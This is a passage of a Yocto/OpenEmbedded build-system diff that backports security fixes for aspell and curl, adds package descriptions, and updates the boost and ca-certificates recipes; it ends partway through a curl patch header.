+SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz \
+           file://CVE-2019-25051.patch \
+"
 SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3"
 SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2"
 
diff --git a/meta/recipes-support/aspell/files/CVE-2019-25051.patch b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
new file mode 100644
index 0000000000..8513f6de79
--- /dev/null
+++ b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
@@ -0,0 +1,101 @@
+From 0718b375425aad8e54e1150313b862e4c6fd324a Mon Sep 17 00:00:00 2001
+From: Kevin Atkinson <kevina@gnu.org>
+Date: Sat, 21 Dec 2019 20:32:47 +0000
+Subject: [PATCH] objstack: assert that the alloc size will fit within a chunk
+ to prevent a buffer overflow
+
+Bug found using OSS-Fuze.
+
+Upstream-Status: Backport
+[https://github.com/gnuaspell/aspell/commit/0718b375425aad8e54e1150313b862e4c6fd324a]
+CVE: CVE-2019-25051
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ common/objstack.hpp | 18 ++++++++++++++----
+ 1 file changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/common/objstack.hpp b/common/objstack.hpp
+index 3997bf7..bd97ccd 100644
+--- a/common/objstack.hpp
++++ b/common/objstack.hpp
+@@ -5,6 +5,7 @@
+ #include "parm_string.hpp"
+ #include <stdlib.h>
+ #include <assert.h>
++#include <stddef.h>
+ 
+ namespace acommon {
+ 
+@@ -26,6 +27,12 @@ class ObjStack
+   byte * temp_end;
+   void setup_chunk();
+   void new_chunk();
++  bool will_overflow(size_t sz) const {
++    return offsetof(Node,data) + sz > chunk_size;
++  }
++  void check_size(size_t sz) {
++    assert(!will_overflow(sz));
++  }
+ 
+   ObjStack(const ObjStack &);
+   void operator=(const ObjStack &);
+@@ -56,7 +63,7 @@ class ObjStack
+   void * alloc_bottom(size_t size)  {
+     byte * tmp = bottom;
+     bottom += size;
+-    if (bottom > top) {new_chunk(); tmp = bottom; bottom += size;}
++    if (bottom > top) {check_size(size); new_chunk(); tmp = bottom; bottom += size;}
+     return tmp;
+   }
+   // This alloc_bottom will insure that the object is aligned based on the
+@@ -66,7 +73,7 @@ class ObjStack
+     align_bottom(align);
+     byte * tmp = bottom;
+     bottom += size;
+-    if (bottom > top) {new_chunk(); goto loop;}
++    if (bottom > top) {check_size(size); new_chunk(); goto loop;}
+     return tmp;
+   }
+   char * dup_bottom(ParmString str) {
+@@ -79,7 +86,7 @@ class ObjStack
+   // always be aligned as such.
+   void * alloc_top(size_t size) {
+     top -= size;
+-    if (top < bottom) {new_chunk(); top -= size;}
++    if (top < bottom) {check_size(size); new_chunk(); top -= size;}
+     return top;
+   }
+   // This alloc_top will insure that the object is aligned based on
+@@ -88,7 +95,7 @@ class ObjStack
+   {loop:
+     top -= size;
+     align_top(align);
+-    if (top < bottom) {new_chunk(); goto loop;}
++    if (top < bottom) {check_size(size); new_chunk(); goto loop;}
+     return top;
+   }
+   char * dup_top(ParmString str) {
+@@ -117,6 +124,7 @@ class ObjStack
+   void * alloc_temp(size_t size) {
+     temp_end = bottom + size;
+     if (temp_end > top) {
++      check_size(size);
+       new_chunk();
+       temp_end = bottom + size;
+     }
+@@ -131,6 +139,7 @@ class ObjStack
+     } else {
+       size_t s = temp_end - bottom;
+       byte * p = bottom;
++      check_size(size);
+       new_chunk();
+       memcpy(bottom, p, s);
+       temp_end = bottom + size;
+@@ -150,6 +159,7 @@ class ObjStack
+     } else {
+       size_t s = temp_end - bottom;
+       byte * p = bottom;
++      check_size(size);
+       new_chunk();
+       memcpy(bottom, p, s);
+       temp_end = bottom + size;
diff --git a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
index c297912588..ad30617e56 100644
--- a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
+++ b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
@@ -1,5 +1,7 @@
 SUMMARY = "AT-SPI 2 Toolkit Bridge"
+DESCRIPTION = "Contains a library that bridges ATK to At-Spi2 D-Bus service. Toolkit widgets use it to provide their content to screen readers such as Orca."
 HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
 LICENSE = "LGPL-2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 
diff --git a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
index 84e05e77fc..2ad09878b7 100644
--- a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
+++ b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
@@ -1,5 +1,9 @@
 SUMMARY = "Assistive Technology Service Provider Interface (dbus core)"
+
+DESCRIPTION = "It provides a Service Provider Interface for the Assistive Technologies available on the GNOME platform and a library against which applications can be linked."
+
 HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
 LICENSE = "LGPL-2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 
diff --git a/meta/recipes-support/atk/atk_2.34.1.bb b/meta/recipes-support/atk/atk_2.34.1.bb
index 741350ffe5..25ef3c6c52 100644
--- a/meta/recipes-support/atk/atk_2.34.1.bb
+++ b/meta/recipes-support/atk/atk_2.34.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Accessibility toolkit for GNOME"
+DESCRIPTION = "Provides application programming interfaces (APIs) for implementing accessibility support in software."
 HOMEPAGE = "https://wiki.gnome.org/Accessibility"
 BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues"
 SECTION = "x11/libs"
diff --git a/meta/recipes-support/attr/acl_2.2.53.bb b/meta/recipes-support/attr/acl_2.2.53.bb
index 5bb50f77f7..7cee45948d 100644
--- a/meta/recipes-support/attr/acl_2.2.53.bb
+++ b/meta/recipes-support/attr/acl_2.2.53.bb
@@ -1,5 +1,10 @@
 SUMMARY = "Utilities for managing POSIX Access Control Lists"
+DESCRIPTION = "ACL allows you to provide different levels of access to files \
+and folders for different users."
+
 HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
+BUGTRACKER = "http://savannah.nongnu.org/bugs/?group=acl"
+
 SECTION = "libs"
 
 LICENSE = "LGPLv2.1+ & GPLv2+"
diff --git a/meta/recipes-support/attr/attr.inc b/meta/recipes-support/attr/attr.inc
index f13a83a7b4..30ba0b4445 100644
--- a/meta/recipes-support/attr/attr.inc
+++ b/meta/recipes-support/attr/attr.inc
@@ -1,4 +1,6 @@
 SUMMARY = "Utilities for manipulating filesystem extended attributes"
+DESCRIPTION = "Implement the ability for a user to attach name:value pairs to objects within the XFS filesystem."
+
 HOMEPAGE = "http://savannah.nongnu.org/projects/attr/"
 SECTION = "libs"
 
diff --git a/meta/recipes-support/bash-completion/bash-completion_2.10.bb b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
index 93e7d9dc3c..1f99bf7386 100644
--- a/meta/recipes-support/bash-completion/bash-completion_2.10.bb
+++ b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
@@ -1,4 +1,9 @@
 SUMMARY = "Programmable Completion for Bash 4"
+DESCRIPTION = "Collection of command line command completions for the Bash shell, \
+collection of helper functions to assist in creating new completions, \
+and set of facilities for loading completions automatically on demand, as well \
+as installing them."
+
 HOMEPAGE = "https://github.com/scop/bash-completion"
 BUGTRACKER = "https://github.com/scop/bash-completion/issues"
 
diff --git a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
index 7c4db85b32..6a93cacc18 100644
--- a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
+++ b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
@@ -9,7 +9,7 @@ SECTION = "console/utils"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "git://github.com/intel/${BPN}"
+SRC_URI = "git://github.com/intel/${BPN};branch=main;protocol=https"
 
 SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d"
 S = "${WORKDIR}/git"
@@ -22,4 +22,4 @@ RDEPENDS_${PN} = "python3-core python3-compression python3-mmap python3-setuptoo
 inherit python3native
 inherit setuptools3
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/boost/boost-1.72.0.inc b/meta/recipes-support/boost/boost-1.72.0.inc
index 55a095bf1c..d152895f09 100644
--- a/meta/recipes-support/boost/boost-1.72.0.inc
+++ b/meta/recipes-support/boost/boost-1.72.0.inc
@@ -11,7 +11,7 @@ BOOST_VER = "${@"_".join(d.getVar("PV").split("."))}"
 BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}"
 BOOST_P = "boost_${BOOST_VER}"
 
-SRC_URI = "https://dl.bintray.com/boostorg/release/${PV}/source/${BOOST_P}.tar.bz2"
+SRC_URI = "https://boostorg.jfrog.io/artifactory/main/release/${PV}/source/${BOOST_P}.tar.bz2"
 SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0"
 SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722"
 
diff --git a/meta/recipes-support/boost/boost.inc b/meta/recipes-support/boost/boost.inc
index 8eb9494381..1c13fb3599 100644
--- a/meta/recipes-support/boost/boost.inc
+++ b/meta/recipes-support/boost/boost.inc
@@ -1,4 +1,8 @@
 SUMMARY = "Free peer-reviewed portable C++ source libraries"
+DESCRIPTION = "Provides free peer-reviewed portable C++ source libraries.  The emphasis is on libraries which work well with the C++ \
+Standard Library.  One goal is to establish 'existing practice' and \
+provide reference implementations so that the Boost libraries are suitable for eventual standardization.  Some of the libraries have already been proposed for inclusion in the C++ Standards Committee's \
+upcoming C++ Standard Library Technical Report."
 SECTION = "libs"
 DEPENDS = "bjam-native zlib bzip2"
 
@@ -161,7 +165,7 @@ do_configure() {
 
 	# D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation.
 	rm -f ${WORKDIR}/user-config.jam
-	echo 'using gcc : 4.3.1 : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
+	echo 'using gcc : : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
 
 	# If we want Python then we need to tell Boost *exactly* where to find it
 	if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then
diff --git a/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
new file mode 100644
index 0000000000..46c706931b
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
@@ -0,0 +1,32 @@
+From f9d0e594d43afcb4ab0043117249feb266ba4515 Mon Sep 17 00:00:00 2001
+From: Romain Geissler <romain.geissler@amadeus.com>
+Date: Tue, 10 Aug 2021 14:22:28 +0000
+Subject: [PATCH] Fix -Wsign-compare warning with glibc 2.34 on Linux
+ platforms.
+
+In file included from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread_only.hpp:17,
+                 from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread.hpp:12,
+                 from src/GetTest.cpp:12:
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp: In member function 'void boost::thread_attributes::set_stack_size(std::size_t)':
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp:61:19: error: comparison of integer expressions of different signedness: 'std::size_t' {aka 'long unsigned int'} and 'long int' [-Werror=sign-compare]
+   61 |           if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+      |                   ^
+
+Upstream-Status: Backport [1.78.0 https://github.com/boostorg/thread/commit/f9d0e594d43afcb4ab0043117249feb266ba4515]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index bc9b1367..c43b276d 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -58,7 +58,7 @@ namespace boost
+           std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+ #ifdef PTHREAD_STACK_MIN
+-          if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
++          if (size<static_cast<std::size_t>(PTHREAD_STACK_MIN)) size=PTHREAD_STACK_MIN;
+ #endif
+           size = ((size+page_size-1)/page_size)*page_size;
+           int res = pthread_attr_setstacksize(&val_, size);
diff --git a/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
new file mode 100644
index 0000000000..3784cf9165
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
@@ -0,0 +1,24 @@
+From 74fb0a26099bc51d717f5f154b37231ce7df3e98 Mon Sep 17 00:00:00 2001
+From: Rob Boehne <robb@datalogics.com>
+Date: Wed, 20 Nov 2019 11:25:20 -0600
+Subject: [PATCH] Revert change to elide a warning that caused Solaris builds
+ to fail.
+
+Upstream-Status: Backport [1.73.0 https://github.com/boostorg/thread/commit/74fb0a26099bc51d717f5f154b37231ce7df3e98]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index aefbeb43..bc9b1367 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -57,7 +57,7 @@ namespace boost
+ #else
+           std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+-#if PTHREAD_STACK_MIN > 0
++#ifdef PTHREAD_STACK_MIN
+           if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ #endif
+           size = ((size+page_size-1)/page_size)*page_size;
diff --git a/meta/recipes-support/boost/boost/arm-intrinsics.patch b/meta/recipes-support/boost/boost/arm-intrinsics.patch
deleted file mode 100644
index fe85c69a82..0000000000
--- a/meta/recipes-support/boost/boost/arm-intrinsics.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-Upstream-Status: Backport
-
-8/17/2010 - rebased to 1.44 by Qing He <qing.he@intel.com>
-
-diff --git a/boost/smart_ptr/detail/atomic_count_sync.hpp b/boost/smart_ptr/detail/atomic_count_sync.hpp
-index b6359b5..78b1cc2 100644
---- a/boost/smart_ptr/detail/atomic_count_sync.hpp
-+++ b/boost/smart_ptr/detail/atomic_count_sync.hpp
-@@ -33,17 +33,46 @@ public:
- 
-     long operator++()
-     {
-+#ifdef __ARM_ARCH_7A__
-+       int v1, tmp;
-+       asm volatile ("1:                 \n\t"
-+                     "ldrex   %0, %1     \n\t"
-+                     "add     %0 ,%0, #1 \n\t"
-+                     "strex   %2, %0, %1 \n\t"
-+                     "cmp     %2, #0     \n\t"
-+                     "bne     1b         \n\t"
-+                     : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+                    );
-+#else
-         return __sync_add_and_fetch( &value_, 1 );
-+#endif
-     }
- 
-     long operator--()
-     {
-+#ifdef __ARM_ARCH_7A__
-+       int v1, tmp;
-+       asm volatile ("1:                 \n\t"
-+                     "ldrex   %0, %1     \n\t"
-+                     "sub     %0 ,%0, #1 \n\t"
-+                     "strex   %2, %0, %1 \n\t"
-+                     "cmp     %2, #0     \n\t"
-+                     "bne     1b         \n\t"
-+                     : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+                    );
-+       return value_;
-+#else
-         return __sync_add_and_fetch( &value_, -1 );
-+#endif
-     }
- 
-     operator long() const
-     {
-+#if __ARM_ARCH_7A__
-+        return value_;
-+#else
-         return __sync_fetch_and_add( &value_, 0 );
-+#endif
-     }
- 
- private:
diff --git a/meta/recipes-support/boost/boost_1.72.0.bb b/meta/recipes-support/boost/boost_1.72.0.bb
index 51c84bc935..b3ec11933c 100644
--- a/meta/recipes-support/boost/boost_1.72.0.bb
+++ b/meta/recipes-support/boost/boost_1.72.0.bb
@@ -1,7 +1,7 @@
 require boost-${PV}.inc
 require boost.inc
 
-SRC_URI += "file://arm-intrinsics.patch \
+SRC_URI += " \
            file://boost-CVE-2012-2677.patch \
            file://boost-math-disable-pch-for-gcc.patch \
            file://0001-Apply-boost-1.62.0-no-forced-flags.patch.patch \
@@ -9,4 +9,6 @@ SRC_URI += "file://arm-intrinsics.patch \
            file://0001-dont-setup-compiler-flags-m32-m64.patch \
            file://0001-revert-cease-dependence-on-range.patch \
            file://0001-added-typedef-executor_type.patch \
+           file://0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch \
+           file://0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch \
            "
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
new file mode 100644
index 0000000000..5c4a32f526
--- /dev/null
+++ b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
@@ -0,0 +1,80 @@
+From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Mon, 18 Oct 2021 12:05:49 +0200
+Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired
+ certificates."
+
+This avoids a dependency on python3-cryptography, and only checks
+for expired certs (which is upstream concern, but not ours).
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ debian/changelog        |  1 -
+ debian/control          |  2 +-
+ mozilla/certdata2pem.py | 11 -----------
+ 3 files changed, 1 insertion(+), 13 deletions(-)
+
+diff --git a/debian/changelog b/debian/changelog
+index 531e4d0..4006509 100644
+--- a/debian/changelog
++++ b/debian/changelog
+@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low
+     - "Trustis FPS Root CA"
+     - "Staat der Nederlanden Root CA - G3"
+   * Blacklist expired root certificate "DST Root CA X3" (closes: #995432)
+-  * mozilla/certdata2pem.py: print a warning for expired certificates.
+ 
+  -- Julien Cristau <jcristau@debian.org>  Thu, 07 Oct 2021 17:12:47 +0200
+ 
+diff --git a/debian/control b/debian/control
+index 4434b7a..5c6ba24 100644
+--- a/debian/control
++++ b/debian/control
+@@ -3,7 +3,7 @@ Section: misc
+ Priority: optional
+ Maintainer: Julien Cristau <jcristau@debian.org>
+ Build-Depends: debhelper-compat (= 13), po-debconf
+-Build-Depends-Indep: python3, openssl, python3-cryptography
++Build-Depends-Indep: python3, openssl
+ Standards-Version: 4.5.0.2
+ Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git
+ Vcs-Browser: https://salsa.debian.org/debian/ca-certificates
+diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
+index ede23d4..7d796f1 100644
+--- a/mozilla/certdata2pem.py
++++ b/mozilla/certdata2pem.py
+@@ -21,16 +21,12 @@
+ # USA.
+ 
+ import base64
+-import datetime
+ import os.path
+ import re
+ import sys
+ import textwrap
+ import io
+ 
+-from cryptography import x509
+-
+-
+ objects = []
+ 
+ # Dirty file parser.
+@@ -121,13 +117,6 @@ for obj in objects:
+     if obj['CKA_CLASS'] == 'CKO_CERTIFICATE':
+         if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]:
+             continue
+-
+-        cert = x509.load_der_x509_certificate(obj['CKA_VALUE'])
+-        if cert.not_valid_after < datetime.datetime.now():
+-            print('!'*74)
+-            print('Trusted but expired certificate found: %s' % obj['CKA_LABEL'])
+-            print('!'*74)
+-
+         bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\
+                                       .replace(' ', '_')\
+                                       .replace('(', '=')\
+-- 
+2.20.1
+
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
deleted file mode 100644
index aa2c85ff43..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From b6d18ca77f131cdcaa10d0eaa9d303399767edf6 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:18:14 +0200
-Subject: [PATCH] certdata2pem.py: use python3
-
-Comments in that file imply it is already py3 compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- mozilla/Makefile        | 2 +-
- mozilla/certdata2pem.py | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/mozilla/Makefile b/mozilla/Makefile
-index 6f46118..f98877c 100644
---- a/mozilla/Makefile
-+++ b/mozilla/Makefile
-@@ -3,7 +3,7 @@
- #
- 
- all:
--	python certdata2pem.py
-+	python3 certdata2pem.py
- 
- clean:
- 	-rm -f *.crt
-diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
-index 0b02b2a..7d796f1 100644
---- a/mozilla/certdata2pem.py
-+++ b/mozilla/certdata2pem.py
-@@ -1,4 +1,4 @@
--#!/usr/bin/python
-+#!/usr/bin/python3
- # vim:set et sw=4:
- #
- # certdata2pem.py - splits certdata.txt into multiple files
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
deleted file mode 100644
index a113fa8b15..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-Upstream-Status: Pending
-
-Let us alter the install destination of the script via SBINDIR
-
---- ca-certificates-20130119.orig/sbin/Makefile
-+++ ca-certificates-20130119/sbin/Makefile
-@@ -3,9 +3,12 @@
- #
- #
-
-+SBINDIR = /usr/sbin
-+
- all:
-
- clean:
-
- install:
--	install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/
-+	install -d $(DESTDIR)$(SBINDIR)
-+	install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
deleted file mode 100644
index 6e2171f758..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 30378026d136efa779732e3f6664e2ecf461e458 Mon Sep 17 00:00:00 2001
-From: Patrick Ohly <patrick.ohly@intel.com>
-Date: Thu, 17 Mar 2016 12:38:09 +0100
-Subject: [PATCH] update-ca-certificates: support Toybox
-
-"mktemp -t" is deprecated and does not work when using Toybox. Replace
-with something that works also with Toybox.
-
-Upstream-Status: Pending
-
-Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
----
- sbin/update-ca-certificates | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates
-index 79c41bb..ae9e3f1 100755
---- a/sbin/update-ca-certificates
-+++ b/sbin/update-ca-certificates
-@@ -113,9 +113,9 @@ trap cleanup 0
- 
- # Helper files.  (Some of them are not simple arrays because we spawn
- # subshells later on.)
--TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")"
--ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
--REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
-+TEMPBUNDLE="$(mktemp -p${TMPDIR:-/tmp} "${CERTBUNDLE}.tmp.XXXXXX")"
-+ADDED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-+REMOVED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
- 
- # Adds a certificate to the list of trusted ones.  This includes a symlink
- # in /etc/ssl/certs to the certificate file and its inclusion into the
--- 
-2.1.4
diff --git a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
index ce3cb217a1..a54d6b458a 100644
--- a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb
+++ b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
@@ -5,7 +5,7 @@ This derived from Debian's CA Certificates."
 HOMEPAGE = "http://packages.debian.org/sid/ca-certificates"
 SECTION = "misc"
 LICENSE = "GPL-2.0+ & MPL-2.0"
-LIC_FILES_CHKSUM = "file://debian/copyright;md5=aeb420429b1659507e0a5a1b123e8308"
+LIC_FILES_CHKSUM = "file://debian/copyright;md5=ae5b36b514e3f12ce1aa8e2ee67f3d7e"
 
 # This is needed to ensure we can run the postinst at image creation time
 DEPENDS = ""
@@ -14,17 +14,16 @@ DEPENDS_class-nativesdk = "openssl-native"
 # Need rehash from openssl and run-parts from debianutils
 PACKAGE_WRITE_DEPS += "openssl-native debianutils-native"
 
-SRCREV = "c28799b138b044c963d24c4a69659b6e5486e3be"
+SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8"
 
-SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \
            file://0002-update-ca-certificates-use-SYSROOT.patch \
            file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \
-           file://update-ca-certificates-support-Toybox.patch \
            file://default-sysroot.patch \
-           file://sbindir.patch \
            file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \
-           file://0001-certdata2pem.py-use-python3.patch \
+           file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \
            "
+UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)"
 
 S = "${WORKDIR}/git"
 
@@ -83,8 +82,8 @@ do_install_append_class-native () {
     SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates
 }
 
-RDEPENDS_${PN}_class-target = "openssl-bin"
-RDEPENDS_${PN}_class-native = "openssl-native"
-RDEPENDS_${PN}_class-nativesdk = "nativesdk-openssl-bin"
+RDEPENDS_${PN}_append_class-target = " openssl-bin openssl"
+RDEPENDS_${PN}_append_class-native = " openssl-native"
+RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl"
 
 BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/consolekit/consolekit_0.4.6.bb b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
index 89f2d77b66..22e755747b 100644
--- a/meta/recipes-support/consolekit/consolekit_0.4.6.bb
+++ b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Framework for defining and tracking users, login sessions, and seats"
+DESCRIPTION = "It provides a mechanism for software to react to changes \
+of any of these items or of any of the metadata associated with them."
 HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit"
 BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit"
 
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8231.patch b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
new file mode 100644
index 0000000000..51f40047f1
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
@@ -0,0 +1,1092 @@
+From c3359693e17fccdf2a04f0b908bc8f51cdc38133 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 27 Apr 2020 00:33:21 +0200
+Subject: [PATCH 1/3] conncache: various concept cleanups
+
+More connection cache accesses are protected by locks.
+
+CONNCACHE_* is a beter prefix for the connection cache lock macros.
+
+Curl_attach_connnection: now called as soon as there's a connection
+struct available and before the connection is added to the connection
+cache.
+
+Curl_disconnect: now assumes that the connection is already removed from
+the connection cache.
+
+Ref: #4915
+Closes #5009
+
+Upstream-commit: c06902713998d68202c5a764de910ba8d0e8f54d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0004-curl-7.69.1-CVE-2020-8231.patch ]
+CVE: CVE-2020-8286
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/conncache.c       | 87 ++++++++++++++++++++-----------------------
+ lib/conncache.h       |  9 ++---
+ lib/hostip.c          | 12 +++---
+ lib/http_negotiate.h  |  6 ++-
+ lib/http_ntlm.h       |  6 ++-
+ lib/multi.c           | 56 ++++++++++++++--------------
+ lib/multiif.h         |  1 +
